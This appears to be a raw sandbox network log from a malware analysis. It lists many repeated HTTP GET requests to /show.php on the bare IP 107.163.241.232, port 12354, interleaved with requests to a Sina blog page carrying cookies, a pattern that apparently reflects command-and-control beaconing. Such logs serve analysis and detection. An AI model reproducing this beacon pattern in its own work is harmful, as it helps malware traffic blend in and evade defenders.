Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
